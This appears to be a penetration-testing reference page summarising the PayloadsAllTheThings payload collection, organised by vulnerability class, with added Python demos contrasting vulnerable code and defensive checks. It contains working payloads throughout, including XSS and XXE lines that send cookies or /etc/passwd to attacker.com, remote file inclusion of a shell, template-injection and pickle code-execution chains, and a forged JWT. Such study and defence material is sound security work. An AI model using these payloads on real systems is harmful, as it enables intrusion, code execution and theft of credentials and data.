# PayloadsAllTheThings

PayloadsAllTheThings is a large community-maintained GitHub repository of attack payloads, filter bypasses and exploitation techniques, organized by vulnerability class. It is a standard reference for penetration testing, CTF challenges and web application security research.
## Repository Structure

Directory names below are the ones used in the repository itself.

| Path | Purpose |
|---|---|
| XSS Injection/ | Cross-site scripting payloads (reflected, stored, DOM) |
| SQL Injection/ | Database injection across engines (MySQL, PostgreSQL, MSSQL, Oracle, SQLite) |
| Command Injection/ | OS command execution payloads |
| Server Side Request Forgery/ | SSRF targets and filter bypasses |
| XXE Injection/ | XML External Entity attack payloads |
| Directory Traversal/ | Path traversal and traversal bypass techniques |
| File Inclusion/ | LFI and RFI exploitation patterns |
| Server Side Template Injection/ | SSTI payloads across template engines |
| CORS Misconfiguration/ | Cross-Origin Resource Sharing misconfigurations |
| CSRF Injection/ | Cross-Site Request Forgery techniques |
| Insecure Direct Object References/ | IDOR patterns |
| Insecure Deserialization/ | Java, PHP, Python deserialization gadgets |
## XSS Payloads

### Reflected XSS

```html
<!-- Basic alert -->
<script>alert('XSS')</script>
<!-- Breaking out of a quoted attribute value -->
"><script>alert('XSS')</script>
<!-- Event handler (no <script> tag needed, survives filters that only strip "script") -->
<img src=x onerror="alert('XSS')">
<!-- Encoding bypass: builds the string "XSS" without quotes -->
<script>alert(String.fromCharCode(88,83,83))</script>
<!-- SVG context -->
<svg onload="alert('XSS')">
```

### Stored XSS

```html
<!-- Image tag with event handler; document.cookie does not include HttpOnly cookies -->
<img src=x onerror="fetch('http://attacker.com/steal.php?cookie='+document.cookie)">
<!-- SVG injection, cookie base64-encoded in the query string -->
<svg/onload="new Image().src='http://attacker.com/log?c='+btoa(document.cookie)">
<!-- Payload kept in a data attribute and evaluated by the handler (hides the JavaScript from keyword filters) -->
<div data-x="alert('XSS')" onclick="eval(this.dataset.x)">Click</div>
<!-- Meta refresh to a javascript: URL (current browsers refuse javascript: navigations from a meta refresh; legacy engines only) -->
<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">
```

### DOM XSS

```javascript
// Vulnerable pattern: untrusted input written to an HTML sink
document.getElementById('output').innerHTML = userInput;
// Payload (if input is <img src=x onerror="alert('DOM XSS')">): the handler runs as soon as
// the element is inserted. Typical sources: location.hash, location.search, document.referrer,
// window.name, postMessage data.

// Other source -> sink pairs
// eval() injection
eval(userInput); // Payload: alert('XSS')
// setTimeout/setInterval evaluate a string argument as code
setTimeout(userInput, 1000); // Payload: alert('XSS')
```
## SQL Injection Payloads

### MySQL Injection

```sql
-- Basic union-based (the column count must match the original query; adjust 1,2,3,4)
' UNION SELECT 1,2,3,4-- -
-- Extract database name
' UNION SELECT 1,database(),3,4-- -
-- Extract table names
' UNION SELECT 1,GROUP_CONCAT(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- -
-- Extract columns
' UNION SELECT 1,GROUP_CONCAT(column_name),3,4 FROM information_schema.columns WHERE table_name='users'-- -
-- Time-based blind
' AND SLEEP(5)-- -
```

### MSSQL Injection

```sql
-- Basic union
' UNION SELECT 1,2,3,4-- -
-- Extract version and database name
' UNION SELECT 1,@@version,3,4-- -
' UNION SELECT 1,DB_NAME(),3,4-- -
-- Extract user tables (sysobjects is the legacy view; sys.tables on current versions)
' UNION SELECT 1,name,3,4 FROM sysobjects WHERE xtype='U'-- -
-- Time-based blind (stacked query)
'; WAITFOR DELAY '00:00:05'-- -
```

### PostgreSQL Injection

```sql
-- Basic union
' UNION SELECT 1,2,3,4-- -
-- Extract database
' UNION SELECT 1,current_database(),3,4-- -
-- Extract tables
' UNION SELECT 1,tablename,3,4 FROM pg_tables WHERE schemaname='public'-- -
-- Time-based blind (stacked query; needs a driver that sends multiple statements)
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END-- -
-- Time-based blind without stacked queries
' AND (SELECT 1 FROM pg_sleep(5)) IS NOT NULL-- -
```

### SQLite Injection

```sql
-- Basic union
' UNION SELECT 1,2,3,4-- -
-- Extract table names
' UNION SELECT 1,name,3,4 FROM sqlite_master WHERE type='table'-- -
-- Extract columns: the sql column of sqlite_master holds the CREATE TABLE statement
-- (PRAGMA table_info cannot be injected into a SELECT)
' UNION SELECT 1,sql,3,4 FROM sqlite_master WHERE name='users'-- -
-- Time-based blind: SQLite has no sleep(), so burn CPU with a large RANDOMBLOB
' AND 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- -
-- Conditional error-based: load_extension() raises an error only when the ELSE branch runs
' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE load_extension(1) END)-- -
```
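The SQLite UNION payloads above, run against a real query. This is an added example, not code from the page or from the repository: the `users` table and its rows are constructed for the demonstration, and the two lookup functions stand in for an application's login code. It shows the injectable string-formatted query leaking the schema through `sqlite_master`, and the parameterised version treating the same payload as a plain username.

```python
import sqlite3

# Constructed sample schema for the demonstration (not from the page).
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
INSERT INTO users VALUES (1, 'alice', 's3cret', 'admin');
INSERT INTO users VALUES (2, 'bob', 'hunter2', 'user');
"""

# Payloads: an auth bypass and the sqlite_master dump from the section above
# (the dump selects name and sql so the CREATE TABLE text lands in a displayed column).
AUTH_BYPASS = "' OR 1=1-- -"
SCHEMA_DUMP = "' UNION SELECT 1,name,sql,4 FROM sqlite_master WHERE type='table'-- -"


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, username: str) -> list:
    # The injectable pattern: user input spliced into the SQL text.
    sql = f"SELECT id, username, role, password FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, username: str) -> list:
    # Parameterised query: the value is bound separately, so quotes and
    # comment sequences inside it never reach the SQL parser.
    sql = "SELECT id, username, role, password FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def leaked_schema(conn: sqlite3.Connection) -> list:
    """Run the UNION payload through the vulnerable function; the third column
    of each returned row is a CREATE TABLE statement from sqlite_master."""
    return [row[2] for row in vulnerable_lookup(conn, SCHEMA_DUMP)]


if __name__ == "__main__":
    conn = build_db()
    print("bypass rows :", vulnerable_lookup(conn, AUTH_BYPASS))   # both users
    print("leaked DDL  :", leaked_schema(conn))                   # CREATE TABLE users (...)
    print("safe lookup :", safe_lookup(conn, AUTH_BYPASS))        # [] - payload is just a name
```

The `-- -` trailer matters: it comments out the closing quote the application appends, and the trailing `-` keeps the comment valid on engines that require a space after `--`.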
## Command Injection Payloads

```bash
# Basic command separators (which ones survive depends on the shell and on how the input is quoted)
; ls -la
| whoami
|| id          # runs only if the preceding command fails
& cat /etc/passwd
&& whoami      # runs only if the preceding command succeeds
# Pipe to a shell
command1 | bash
command1 | sh
# Command substitution (expanded inside double quotes, not inside single quotes)
$(whoami)
`whoami`
# Space filter bypass: ${IFS} expands to the shell's internal field separator
${IFS}cat${IFS}/etc/passwd
# Glob patterns (bypass filters that match exact file names)
cat /etc/passw*
# Null byte injection: truncates the argument in C-based wrappers (older systems only)
cat /etc/passwd%00.txt
```
## SSRF Payloads

```bash
# Loopback targets
http://127.0.0.1/admin
http://localhost:8080
http://[::1]:80/
# Private (RFC 1918) ranges to sweep for internal services
http://10.0.0.1
http://172.16.0.1       # 172.16.0.0/12
http://192.168.0.1      # 192.168.0.0/16
# Cloud metadata endpoints
http://169.254.169.254/latest/meta-data/              # AWS (IMDSv2 additionally needs a token obtained with a PUT, sent as a header)
http://metadata.google.internal/computeMetadata/v1/   # GCP (requires the request header Metadata-Flavor: Google)
# Filter bypasses
http://127.1                    # short form, resolves to 127.0.0.1
http://0.0.0.0                  # reaches the local host on Linux
http://localhost:80/../../admin
# Obfuscated spellings of 127.0.0.1 (accepted by libc inet_aton and most HTTP clients)
http://2130706433/              # decimal
http://0x7f.0x0.0x0.0x1         # hexadecimal
http://0177.0.0.1               # octal
```
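A server-side check that catches the obfuscated spellings listed above. This is an added example, not code from the page or the repository; the allow/deny policy (refuse loopback, RFC 1918, link-local, unspecified and reserved addresses) is an assumption, and the `resolver` parameter exists so the function can be exercised offline. It relies on libc's `inet_aton`, which accepts the same legacy forms (`127.1`, decimal, hex, octal) that HTTP clients accept, so the filter sees the address the way the fetcher will.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def parse_ip_literal(host: str):
    """Return an IP address object for any spelling an HTTP client's resolver would
    accept, including the legacy forms from the bypass list (127.1, 2130706433,
    0x7f.0x0.0x0.0x1, 0177.0.0.1). Returns None if host is a DNS name."""
    try:
        return ipaddress.ip_address(host)          # canonical dotted-quad or IPv6
    except ValueError:
        pass
    try:
        packed = socket.inet_aton(host)            # POSIX libc accepts the legacy forms
    except OSError:
        return None
    return ipaddress.IPv4Address(packed)


def _default_resolver(host: str) -> list:
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_internal_target(url: str, resolver=_default_resolver) -> bool:
    """True if the URL points at something an SSRF filter should refuse."""
    host = urlsplit(url).hostname                  # strips userinfo, port and IPv6 brackets
    if not host:
        return True                                # unparseable: refuse rather than guess
    if host == "localhost" or host.endswith(".localhost"):
        return True
    literal = parse_ip_literal(host)
    addresses = [literal] if literal else [ipaddress.ip_address(a) for a in resolver(host)]
    if not addresses:
        return True
    for addr in addresses:
        if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
            addr = addr.ipv4_mapped                # ::ffff:127.0.0.1 is still loopback
        if (addr.is_loopback or addr.is_private or addr.is_link_local
                or addr.is_unspecified or addr.is_reserved or addr.is_multicast):
            return True
    return False


if __name__ == "__main__":
    for u in ("http://127.1", "http://2130706433/", "http://0x7f.0x0.0x0.0x1",
              "http://[::1]:80/", "http://169.254.169.254/latest/meta-data/",
              "http://attacker.com@10.0.0.1/", "http://8.8.8.8/"):
        print(f"{u:45} internal={is_internal_target(u)}")
```

Resolving a hostname here and then letting the HTTP client resolve it again leaves a DNS rebinding window; in production, connect to the address this check approved (or re-check the address the client actually connected to) rather than the hostname.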
## XXE Payloads

```xml
<!-- Basic XXE: the file content is returned in the response -->
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<data>&xxe;</data>
```

Blind XXE with out-of-band exfiltration. A parameter entity cannot be referenced inside an entity value in the internal DTD subset, so the nested definition has to come from an external DTD the attacker hosts:

```xml
<!-- Document sent to the target -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<data>1</data>
```

```xml
<!-- http://attacker.com/evil.dtd: &#x25; is an escaped %, so the inner entity is declared when %eval; expands -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/log?%file;'>">
%eval;
%exfil;
```

Multi-line file content breaks the exfiltration URL, so target a one-line file (such as /etc/hostname) or, on PHP, wrap the source as `php://filter/convert.base64-encode/resource=/etc/passwd`. If the internal subset is filtered, the external DTD can also be referenced directly:

```xml
<!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">
```
## Directory Traversal Payloads

```bash
# Basic traversal
../../../etc/passwd
..\..\..\..\windows\win.ini
# URL-encoded slashes (bypass filters that look for the literal "../")
..%2F..%2F..%2Fetc%2Fpasswd
# Double encoding: works only when the stack decodes the value twice (web server once, application again)
..%252F..%252F..%252Fetc%252Fpasswd
# Null byte injection: truncates an appended suffix such as ".jpg" (PHP < 5.3.4, older C code)
../../../etc/passwd%00.jpg
# Backslash as separator (Windows, and normalisers that only look for "/")
..\..\..\etc\passwd
# Overlong UTF-8 encoding of "/" (historic IIS bug; correct UTF-8 decoders reject it)
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
# Fully URL-encoded dots and slashes
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
```
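How the variants above behave against two kinds of defence. This is an added example, not code from the page or the repository: `naive_strip` is the strip-`../`-once filter that the `....//` payload exists to defeat, and `safe_path` is a containment check that resolves the requested file under a base directory and refuses anything that escapes. The base directory `/srv/app/static` is a constructed path and need not exist; `decode_rounds` models how many times the stack URL-decodes the value, which is what decides whether the double-encoded payload works.

```python
import os
from urllib.parse import unquote

BASE_DIR = "/srv/app/static"   # constructed for the demonstration


def naive_strip(user_path: str) -> str:
    """The blacklist a lot of code ships: remove '../' once.
    '....//' collapses to '../' after one pass, so the filter rebuilds the traversal."""
    return user_path.replace("../", "")


def safe_path(base_dir: str, user_path: str, decode_rounds: int = 1):
    """Resolve user_path under base_dir; return the absolute path, or None if it escapes.
    The web server has normally decoded the URL once already (decode_rounds=1); an
    application that decodes again (decode_rounds=2) is what makes %252F work."""
    path = user_path
    for _ in range(decode_rounds):
        path = unquote(path)                        # overlong %c0%af decodes to U+FFFD, not '/'
    if "\x00" in path:
        return None                                 # never let a null byte reach a C-level open()
    path = path.replace("\\", "/")                  # treat backslash as a separator as well
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, path.lstrip("/")))
    if full != base and not full.startswith(base + os.sep):
        return None                                 # resolved outside the base directory
    return full


if __name__ == "__main__":
    print(naive_strip("....//....//....//etc//passwd"))                  # ../../../etc//passwd
    for p in ("images/logo.png", "../../../etc/passwd", "..%2F..%2F..%2Fetc%2Fpasswd",
              "..%252F..%252F..%252Fetc%252Fpasswd", "../../../etc/passwd%00.jpg"):
        print(f"{p:40} -> {safe_path(BASE_DIR, p)}")
    print(safe_path(BASE_DIR, "..%252F..%252F..%252Fetc%252Fpasswd", decode_rounds=2))  # None
```

The containment check works on the resolved path, so it is indifferent to which encoding produced the dots: it only has to be applied after the last decode and before the file is opened.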
## File Inclusion (LFI/RFI)

### Local File Inclusion

```bash
# Basic LFI
?page=../../../../etc/passwd
?file=....//....//....//etc//passwd      # survives a filter that strips "../" once
# Log poisoning: inject PHP into a logged field (e.g. User-Agent), then include the log
?page=../../../var/log/apache2/access.log
# PHP wrappers
?file=php://filter/convert.base64-encode/resource=index.php   # read source without executing it
?file=php://input                                              # executes the POST body as PHP (needs allow_url_include=On)
?file=data:text/plain,<?php phpinfo(); ?>                      # also needs allow_url_include=On
# Expect wrapper (only if the expect extension is installed)
?file=expect://whoami
```

### Remote File Inclusion

```bash
# Basic RFI (needs allow_url_include=On, which is off by default)
?page=http://attacker.com/shell.php
?file=http://attacker.com/payload.txt    # serve as .txt so the attacker's own server does not execute it
# Null byte to drop a suffix the application appends (PHP < 5.3.4)
?file=http://attacker.com/payload.php%00
# FTP is another wrapper include() accepts
?file=ftp://attacker.com/shell.php
```
## SSTI Payloads

### Jinja2 (Python)

```jinja
{{ 7 * 7 }}                                      # Math evaluation: renders 49 if the input is evaluated as a template
{{ config }}                                     # Flask application config, including SECRET_KEY
{{ self.__dict__ }}                              # Object inspection
{{ ''.__class__.__mro__[1].__subclasses__() }}   # Start of the RCE chain: every loaded class; pick one that reaches os or subprocess
{{ self._TemplateReference__context }}           # Template context (request, url_for, other globals)
```

### Twig (PHP)

```twig
{{ 7 * 7 }}
{{ _self.env.registerUndefinedFilterCallback("exec") }}   # Twig 1.x: registers exec() as the fallback for unknown filters...
{{ _self.env.getFilter("id") }}                           # ...so requesting the filter "id" runs exec("id")
```

### ERB (Ruby)

```erb
<%= 7 * 7 %>
<%= system("id") %>
<%= `whoami` %>
```

### Velocity

```velocity
#set($x='')
#set($rt=$x.class.forName('java.lang.Runtime'))
#set($chr=$x.class.forName('java.lang.Character'))
#set($str=$x.class.forName('java.lang.String'))
#set($proc=$rt.getRuntime().exec('id'))
$proc.waitFor()
#set($out=$proc.getInputStream())
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
```
## CORS Misconfiguration

```http
# Dangerous server behaviour: the Origin request header is reflected unchecked
Origin: https://attacker.com
Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Credentials: true
# attacker.com can now read authenticated responses with fetch(url, {credentials: 'include'})

# 1. Wildcard origin
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
# Browsers reject '*' together with credentials, so a bare wildcard only exposes data that needs no cookie

# 2. null origin accepted (sandboxed iframes, data: and file: pages send Origin: null)
Origin: null
Access-Control-Allow-Origin: null

# 3. Any subdomain trusted (*.victim.com): exploitable from an XSS or a subdomain takeover
Origin: https://attacker.victim.com

# 4. Unanchored regex or substring check for "victim.com"
Origin: https://victim.com.attacker.com
```
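The origin checks that produce bypasses 3 and 4 above, next to a strict one. This is an added example, not code from the page or the repository: the allowlist (`victim.com`, `app.victim.com`) and the HTTPS-only policy are constructed for the demonstration. The naive functions are the substring and suffix checks that `victim.com.attacker.com` and a lookalike such as `evilvictim.com` slip past; the strict check parses the `Origin` value and compares scheme, host and port exactly, and refuses `null`.

```python
import re
from urllib.parse import urlsplit

# Constructed allowlist for the demonstration (not from the page).
ALLOWED_HOSTS = {"victim.com", "app.victim.com"}


def naive_regex_ok(origin: str) -> bool:
    """Unanchored pattern: matches anywhere in the string (bypass 4)."""
    return re.search(r"victim\.com", origin) is not None


def naive_suffix_ok(origin: str) -> bool:
    """Suffix check without a leading dot: matches evilvictim.com as well."""
    return origin.endswith("victim.com")


def strict_origin_ok(origin: str) -> bool:
    """Parse the Origin and compare its components exactly; never pattern-match it."""
    if origin == "null":
        return False                                  # sandboxed iframes and file:// pages send this
    parts = urlsplit(origin)
    try:
        port = parts.port
    except ValueError:
        return False
    if parts.scheme != "https" or parts.hostname is None or port not in (None, 443):
        return False
    if parts.path or parts.query or parts.fragment:
        return False                                  # an Origin header carries no path
    return parts.hostname in ALLOWED_HOSTS


def cors_headers(origin: str) -> dict:
    """Response headers for a credentialed API: echo the exact allowed Origin, never '*'."""
    if not strict_origin_ok(origin):
        return {}                                     # no CORS headers: the browser withholds the response
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",                             # caches must not serve one origin's answer to another
    }


if __name__ == "__main__":
    for o in ("https://victim.com", "https://victim.com.attacker.com",
              "https://evilvictim.com", "https://attacker.victim.com", "null"):
        print(f"{o:35} regex={naive_regex_ok(o)!s:5} suffix={naive_suffix_ok(o)!s:5} strict={strict_origin_ok(o)}")
```

`Vary: Origin` is part of the fix, not an extra: without it a shared cache can store the response for `https://victim.com` and replay it, headers included, to a request from another origin.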
## CSRF Payloads

```html
<!-- Image tag (state-changing GET request) -->
<img src="http://target.com/admin/delete?id=1">
<!-- Auto-submitting form (POST, application/x-www-form-urlencoded, no preflight) -->
<form action="http://target.com/admin/delete" method="POST">
  <input type="hidden" name="id" value="1">
  <input type="submit">
</form>
<script>document.forms[0].submit();</script>
<!-- Fetch request: credentials:'include' attaches cookies. A string body is sent as text/plain,
     so this works only if the endpoint ignores Content-Type; a JSON Content-Type triggers a preflight -->
<script>
fetch('http://target.com/admin/delete', {
  method: 'POST',
  credentials: 'include',
  body: 'id=1'
});
</script>
<!-- XMLHttpRequest equivalent -->
<script>
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://target.com/admin/delete', true);
xhr.withCredentials = true;
xhr.send('id=1');
</script>
<!-- All of these rely on the session cookie being sent cross-site. With SameSite=Lax (the default Chromium applies
     when the attribute is missing) the cookie is sent only on top-level GET navigations, so the img, fetch, XHR and
     form-POST variants fail; SameSite=None (which requires Secure) restores the old behaviour -->
```
## IDOR (Insecure Direct Object Reference)

```bash
# Sequential ID enumeration
/api/users/1
/api/users/2
/api/users/3
# Parameter manipulation
/profile?id=100 → /profile?id=101, 102, 103...
# Short or predictable tokens: try neighbouring values
/invoice?token=abc123 → /invoice?token=abc124...
# UUID/GUID identifiers
/documents/550e8400-e29b-41d4-a716-446655440000
# Random (version 4) UUIDs cannot be enumerated; look for them leaking elsewhere (other API responses,
# shared links, logs). Version 1 UUIDs embed a timestamp and MAC address and can be narrowed down.
# Encoded ID manipulation
/user?id=MQ%3D%3D (base64: MQ== = "1")
# Try MQ%3D%3D ("1"), Mg%3D%3D ("2"), Mw%3D%3D ("3")...
# Horizontal escalation: replace an implicit "me" with another user's identifier
/api/orders/my-orders (returns the caller's orders)
# Try: /api/orders/other-user-id/orders
```
## Deserialization Attacks

### Java (ysoserial gadgets)

```bash
# Generate a payload with ysoserial (base64 for transport in a header or parameter)
java -jar ysoserial.jar CommonsCollections5 'command' | base64
# Common gadget chains (each needs the matching library on the target's classpath)
CommonsCollections1 ... CommonsCollections7
CommonsBeanutils1
Spring1
Spring2
Groovy1
Jdk7u21
JRMPClient
```

### PHP

```php
// Vulnerable pattern
unserialize($_GET['data']);
// Gadget-based RCE: needs a loaded class Test whose magic method ends up calling $this->func($this->arg)
O:4:"Test":2:{s:4:"func";s:6:"system";s:3:"arg";s:2:"id";}
// Magic methods that run without the application calling them
__wakeup()    // during unserialize()
__destruct()  // when the object is destroyed
__toString()  // when the object is used as a string
__get()       // on read of an inaccessible property
__set()       // on write to an inaccessible property
```

### Python Pickle

```python
# Vulnerable sink
pickle.loads(user_data)
# RCE gadget. pickle.dumps(subprocess.Popen(['id'])) does not work: Popen objects are not
# picklable and the command would run on the attacker's side. __reduce__ tells the unpickler
# which callable to invoke, with which arguments, while loading:
import os, pickle
class RCE:
    def __reduce__(self):
        return (os.system, ('id',))
payload = pickle.dumps(RCE())
```
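Both sides of the pickle case: a gadget built with `__reduce__`, the vulnerable `pickle.loads` sink, and a restricted unpickler that refuses every global not on an allowlist. This is an added example, not code from the page or the repository; the allowlist contents are constructed for the demonstration, and `benign_payload` exists only to show that legitimate data still loads. The restricted loader is a last line of defence: the real fix is to not unpickle untrusted input at all.

```python
import collections
import io
import os
import pickle


class Gadget:
    """Serialising this object emits a REDUCE opcode: the unpickler calls os.system(cmd)
    while loading, before any application code sees the resulting object."""
    def __init__(self, cmd: str):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))


def make_payload(cmd: str) -> bytes:
    return pickle.dumps(Gadget(cmd))


def benign_payload() -> bytes:
    # Constructed legitimate data: an OrderedDict pickles via a GLOBAL reference to collections.OrderedDict.
    return pickle.dumps(collections.OrderedDict(a=1, b=2))


def unsafe_loads(data: bytes):
    """The sink from the page: whatever the payload names gets called."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """find_class() is consulted for every GLOBAL/STACK_GLOBAL opcode; allow only named classes."""
    ALLOWED = {("collections", "OrderedDict"), ("builtins", "set")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def loads_safely(data: bytes) -> bool:
    """True if the restricted unpickler accepts the data, False if it rejects a global."""
    try:
        restricted_loads(data)
        return True
    except pickle.UnpicklingError:
        return False


if __name__ == "__main__":
    payload = make_payload("id")
    print(payload)                          # contains the module/name pair 'posix' 'system' and the command
    print("unsafe:", unsafe_loads(payload))  # runs `id`, returns its exit status
    print("restricted accepts gadget:", loads_safely(payload))        # False
    print("restricted accepts benign:", loads_safely(benign_payload()))  # True
```

`pickletools.dis(payload)` shows the opcode stream if you want to see the `GLOBAL`/`REDUCE` pair the allowlist is keyed on.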
## JWT Attacks

```bash
# 1. "none" algorithm: header {"alg":"none","typ":"JWT"}, signature segment left empty
# 2. Weak HMAC secret: crack offline with hashcat (mode 16500), john, or jwt-cracker
# 3. Key confusion (RS256 -> HS256): set alg to HS256 and sign with the server's public key as the HMAC secret;
#    works when the library picks the verification routine from the token header
# 4. Public key injection: if the server takes the verification key from the token (jwk, jku or x5u header), supply your own
# 5. Expired token: edit the exp claim (only useful together with 1-4, since the signature no longer matches)
# Example alg:none token for the claims {"sub":"1234567890","name":"Admin"} (note the trailing dot)
eyJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFkbWluIn0.
```
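A minimal HS256 issuer with two verifiers: one that takes the algorithm from the token header (attack 1 above succeeds against it) and one that pins the algorithm server-side, checks the signature before reading any claim, and enforces `exp`. This is an added example, not code from the page or the repository; it uses only the standard library, so the key-confusion attack (3) is not reproduced, but the same algorithm pin is what closes it. `forge_alg_none` rebuilds the example token from the section above byte for byte.

```python
import base64
import hashlib
import hmac
import json
import time


def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims: dict, key: bytes) -> str:
    signing_input = f"{_segment({'alg': 'HS256', 'typ': 'JWT'})}.{_segment(claims)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def forge_alg_none(claims: dict) -> str:
    """Attack 1: header {"alg":"none"}, empty signature segment."""
    return f"{_segment({'alg': 'none'})}.{_segment(claims)}."


def naive_verify(token: str, key: bytes) -> dict:
    """Vulnerable verifier: trusts the alg named in the token."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))          # no signature check at all
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


def strict_verify(token: str, key: bytes, now=None) -> dict:
    """Pin the algorithm, verify before parsing claims, enforce exp."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":                 # the server decides the algorithm, not the token
        raise ValueError("unexpected alg")
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(p))
    if "exp" in claims and claims["exp"] <= (now if now is not None else time.time()):
        raise ValueError("token expired")
    return claims


def accepts(verifier, token: str, key: bytes) -> bool:
    try:
        verifier(token, key)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    forged = forge_alg_none({"sub": "1234567890", "name": "Admin"})
    print(forged)                                    # the token from the section above
    print("naive accepts forged :", accepts(naive_verify, forged, b"server-secret"))   # True
    print("strict accepts forged:", accepts(strict_verify, forged, b"server-secret"))  # False
    good = sign_hs256({"sub": "1234567890", "exp": int(time.time()) + 300}, b"server-secret")
    print("strict accepts signed:", accepts(strict_verify, good, b"server-secret"))    # True
```

`hmac.compare_digest` returns False for inputs of different length, which is what makes the empty signature segment fail in the strict path even before the algorithm pin is considered.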
## Upload Bypass Techniques

```bash
# Extension bypass (which alternatives execute depends on the server's handler mapping)
file.php → file.php.jpg     # Apache AddHandler matches .php anywhere in a multi-extension name
file.php → file.jpg.php
file.php → file.phtml
file.php → file.php5
file.php → file.shtml       # server-side includes rather than PHP; useful where SSI is enabled
# MIME type bypass: the server trusts the client-supplied Content-Type of the upload part
Actual file: PHP shell
Content-Type: image/jpeg
# Double extension
file.php.jpg
file.jpg.php
# Null byte injection: the stored name is truncated at %00 (PHP < 5.3.4)
file.php%00.jpg
# Case variation (defeats case-sensitive extension checks)
file.PhP
file.pHp
# Image polyglot: valid JPEG header with PHP code appended, passes magic-byte and getimagesize() checks
```
## LDAP Injection

```bash
# Login filter built as (&(cn=USER)(userPassword=PASS)) from unsanitised input. Payload for USER:
admin*)(uid=*))(&(uid=*
# Filter becomes: (&(cn=admin*)(uid=*))(&(uid=*)(userPassword=PASS))
# Most servers evaluate only the first complete filter, so the password clause ends up in the ignored tail
# Wildcard: matches any value when the attribute is inserted raw
cn=*
uid=*
mail=*
# Boolean-based blind: guess an attribute value one prefix at a time and watch whether the request succeeds
admin)(description=a*))(&(cn=admin
admin)(description=b*))(&(cn=admin
# The attribute must be substring-searchable (userPassword normally is not). LDAP has no sleep() primitive,
# so there is no time-based variant; inference works on true/false responses only
```
## NoSQL Injection

### MongoDB

```javascript
// Operator injection: the request body is parsed into an object (express.json, or qs turning
// username[$ne]=1 into {username: {$ne: "1"}}) and passed straight into the query.
// Plain string concatenation does not have this problem, since "$ne" stays a string.
db.users.find({username: req.body.username, password: req.body.password})
// Payload: {"username": {"$ne": null}, "password": {"$ne": null}}
// Query becomes: {username: {$ne: null}, password: {$ne: null}} -> matches the first user
// Other operators
username: {$gt: ""}
password: {$gt: ""}
password: {$regex: "^a"}   // blind extraction of a value one character at a time
// JavaScript evaluation: string concatenation into $where
db.users.find({$where: "this.username == '" + username + "'"})
// Payload: ' || '1'=='1
// Aggregation pipeline: a user-controlled object inside $match accepts the same operators
db.collection.aggregate([{$match: {username: userInput}}])
```

### CouchDB

```javascript
// Mango query: a selector value taken from a user-supplied object accepts operators
{"selector": {"username": userInput}}
// Payload: {"$gt": null}  ->  {"selector": {"username": {"$gt": null}}} matches every document
// Views: the key parameter is raw JSON; if it is assembled from user input the caller can choose any key
_design/users/_view/all?key={"username":"admin"}
```
## Open Redirect

```bash
# Parameter-based
?redirect=http://attacker.com
?next=http://attacker.com
?url=http://attacker.com
?return=http://attacker.com
# Allowlist bypass
?redirect=http://legitsite.com.attacker.com    # subdomain of the attacker's domain
?redirect=http://legitsite.com@attacker.com    # userinfo: a substring check sees legitsite.com, the browser goes to attacker.com
?redirect=http://attacker.com#@legitsite.com   # the allowed host appears only in the fragment
?redirect=//attacker.com                       # protocol-relative URL, passes "must not start with http" checks
# Encoding bypass
?redirect=http://%61%74%74%61%63%6b%65%72.com  # "attacker" percent-encoded
?redirect=http://attacker.com%00legitsite.com  # null byte, only on parsers that truncate at it
# JavaScript protocol: becomes XSS when the value is assigned to location.href
